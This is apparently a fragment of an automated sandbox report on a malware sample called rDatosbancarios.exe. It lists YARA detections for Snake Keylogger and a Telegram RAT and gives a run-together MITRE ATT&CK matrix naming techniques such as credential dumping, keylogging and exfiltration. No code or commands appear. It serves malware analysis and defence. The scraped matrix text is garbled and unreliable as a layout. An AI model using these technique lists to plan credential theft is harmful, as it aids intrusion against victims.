            Source: Yara matchFile source: Process Memory Space: rDatosbancarios.exe PID: 664, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000000A.00000002.3065111248.0000000033C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: rDatosbancarios.exe PID: 664, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            System Network Configuration Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation            		NTDS4
            File and Directory Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets215
            System Information Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.